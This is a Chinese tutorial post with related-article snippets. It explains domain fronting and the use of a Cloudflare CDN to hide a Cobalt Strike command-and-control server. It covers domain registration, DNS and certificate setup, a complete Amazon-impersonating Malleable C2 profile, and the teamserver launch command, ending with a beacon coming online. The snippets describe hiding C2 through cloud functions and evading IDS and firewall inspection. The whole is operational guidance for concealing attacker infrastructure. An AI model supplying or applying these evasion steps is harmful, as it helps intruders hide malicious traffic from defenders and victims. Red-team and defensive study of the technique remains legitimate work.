代码编织梦想

域前置介绍

域前置又译为域名幌子,是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。

域前置工作原理

域前置核心就是CDN,可以通过添加 A 记录或 AAAA 记录解析的方式将网站域名指向网站服务器公网 IP 地址,来实现用户可以通过域名直接访问已部署在服务器上的网站,而无需使用难记且无明显标识的 IP 地址访问。CDN能够对域名进行加速,当对某个域名进行访问时,并不会直接解析到IP,因此可以给攻击VPS申请一个CDN加速服务,从而达到隐藏IP的效果

CDN工作原理

cnd又叫内容分发网络(Content Delivery Network)

当用户访问域名时,先请求LDNS(即本地dns),如果有缓存会返回给用户ip地址,如果LNDS无缓存即向授权DNS请求,授权DNS解析域名返回别名域名,域名解析请求发送至公有云DNS调度系统,则会分配最佳节点ip地址,LDNS会缓存该IP地址,用户根据该ip地址请求资源,节点ip隐藏了真实ip的地址

如果不明白可以参考阿里云的文章

https://developer.aliyun.com/article/779328?spm=5176.21213303.J_6704733920.7.2a5e53c99XBn0I&scm=20140722.S_community%40%40%E6%96%87%E7%AB%A0%40%40779328._.ID_community%40%40%E6%96%87%E7%AB%A0%40%40779328-RL_cdn%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86-LOC_main-OR_ser-V_2-P0_0

搭建过程

这里选择腾讯云的域名

先实名后注册,注册时间可能比较久,在腾讯云服务器上,根据申请的域名添加解析记录。

域名备案,实际上国内的备案了之后Redteam已无法使用了。

注册 cloudflare

https://www.cloudflare.com/zh-cn/

进入后添加站点

输入申请的域名别名,选择免费即可

继续

这里会对域名的A记录和CNAME自动进行检测

这个时候邮箱会收到cloudflare的邮件。

修改dns记录,域名注册->我的域名->概览位置修改dns

然后等待dns刷新即可,此时我们ping一下我们的域名发现,解析后的ip地址不是真实的ip地址。

ip地址为cloudflare的ip

nslookup查询

SSL/TLS

如果要实现https加密需要下载配置c2证书

下载证书

在VPS需重新生成cs的配置文件cobalstrike.store

C2配置隐藏

项目地址

https://github.com/rsmudge/Malleable-C2-Profiles

set sleeptime "5000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

http-get {

    set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
    
    client {
    
        header "Accept" "*/*";
        header "Host" "www.xxx.xxx";    #配置自己的根域名不是别名
    
        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";
            header "Cookie";
        }
    }
    
    server {
    
        header "Server" "Server";
        header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
        header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Content-Encoding" "gzip";
    
        output {
            print;
        }
    }

}

http-post {
    

    set uri "/N4215/adj/amzn.us.sr.aps";
    
    client {
    
        header "Accept" "*/*";
        header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "www.xxx.xxx";   #配置自己的根域名不是别名
    
        parameter "sz" "160x600";
        parameter "oe" "oe=ISO-8859-1;";
    
        id {
            parameter "sn";
        }
    
        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";
    
        output {
            base64;
            print;
        }
    }
    
    server {
    
        header "Server" "Server";
        header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";
        header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";
    
        output {
            print;
        }
    }

}

启动服务端,调用配置文件

./teamserver cs服务端ip password config.profile

生成监听

保存

 

生成64位的应用程序

成功上线

TIPS

实名注册的腾讯云域名的话是有备案的,所以这里的话建议选择国外的服务器注册域名。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YJ_12340/article/details/127964724

domain fronting域名前置网络攻击技术_systemino的博客-爱代码爱编程

千里百科 Domain Fronting基于HTTPS通用规避技术,也被称为域前端网络攻击技术。这是一种用来隐藏Metasploit,Cobalt Strike等团队控制服务器流量,以此来一定程度绕过检查器或防火墙检测的技术,如Amazon ,Google,Akamai 等大型厂商会提供一些域前端技术服务。 下列将会使用Amazon 提供CloudFr

使用腾讯云函数隐藏C2-爱代码爱编程

背景 基于CS,隐藏C2服务端有很多手段,常见如下: 利用域前置走cdn域名利用云厂商服务 其中域前置技术在18年及更早还比较有效,现在越来越多云厂商如cloudflare开始禁止域前置行为: 因此走cdn和利用云厂商服务是更加常用的方法核心思想 核心思想其实很简单,就是由第三方提供的服务接收C2客户端流量,转发给C2服务端,避免直接暴露服务端,因此

域前置技术-爱代码爱编程

  域前置(Domain Fronting) 基于HTTPS通用规避技术,也被称为域前端网络攻击,这是一种用来隐藏Metasploit,Cobalt Strike 等团队控制服务器流量以此来一定程度绕过检查器或防火墙检测的技术,如 Amazon ,Google,Akamai 等大型厂商会提供一些域前端技术服务。 域前置技术原理 通过CDN节点将流量转

某云云函数域前置-爱代码爱编程

目录   云函数内容: 服务端配置 测试 云函数内容: 向真实C2服务器传递客户端真实ip,转发GET、POST请求,内容参考https://mp.weixin.qq.com/s/3EM6vqPJSA5E_FH6tKO8iw 部署后测试,访问API网关,真实服务器监听对应端口,查看数据包: 服务端配置 获取真实ip的必要配置,

域前置Cobalt Strike逃避IDS审计-爱代码爱编程

域前置Cobalt Strike逃避IDS审计 域前置简介 域前置(Domain Fronting)基于HTTPS通用规避技术,也被称为域前端网络攻击技术。 这是一种用来隐藏Metasploit、Cobalt Strike等团队控制服务器流量,以此来一定程度绕过检查器或防火墙检测的技术,如Amazon、Google、Akamai等大型厂商会提供一些域

手把手教你如何隐藏C2-爱代码爱编程

文章来源|MS08067 公众号读者投稿 本文作者:下次一定(白嫖知识星球活动) CDN技术隐藏C2原理 让cdn转发合法的http或者https流量来达到隐藏的目的。 这些文章写的很详细,总结一下流程: 配置了cdn  拥有一个公网域名 配置cdn的A记录解析使其能解析到C2的ip 将公网域名填写到cs listener的

黑客利用域前置技术攻击缅甸政府并隐藏恶意活动-爱代码爱编程

 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 思科Talos 的研究人员发现攻击者正在利用合法域名使用域名前置技术隐藏命令和控制流量,攻击缅甸政府。该合法域名是缅甸政府用于路由受攻击者控制服务器通信的域名,攻击者这样做的目的是躲避检测。 研究人员在2021年9月检测到该攻击,攻击者部署 Cobalt Strike payload 作为

云函数隐藏c2服务器-爱代码爱编程

云函数隐藏C2服务器 (有手就能配置) 0x01 前言 自己踩到的坑点主要就是 1、上线地址要去掉http://和:80 基于CS,隐藏C2服务器的手法有很多,常见如下: 域前置CDN第三方代理软件(heroku)云函数记录一下利用腾讯云的云函数隐藏C2服务器。 壁画不多说直接开始… 0x02环境配置 需要准备: 注册腾讯云账号vps一台c

cobalstrike(cs)上线隐藏ip和流量_曲折上升的博客-爱代码爱编程

本文内容涉及技术原理仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,与作者无关 隐藏IP地址CDN接入(方法一)隧道转发代理(方法二)转发重定向(方法三) 隐藏

还在付费使用 xshell?我选择这款超牛逼的 ssh 客户端,完全免费_写代码的珏秒秒的博客-爱代码爱编程

分享过FinallShell这款SSH客户端,也是xiaoz目前常用的SSH客户端工具,FinalShell使用起来方便顺手,但令我不爽的是tab数量变多的时候FinalShell越来越卡,而且内存占用也比较高。 最近发现一款使用使用C语言开发的跨平台SSH客户端WindTerm,完全免费用于商业和非商业用途,没有限制。 所有发布的源代码(第三方目录除外

域前置技术和c2隐藏_cdn 安全 隐藏 域前置-爱代码爱编程

域前置介绍 域前置又译为域名幌子,是一种隐藏连接真实端点来规避的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。 域前置工作原理 域前置核心就是CDN,可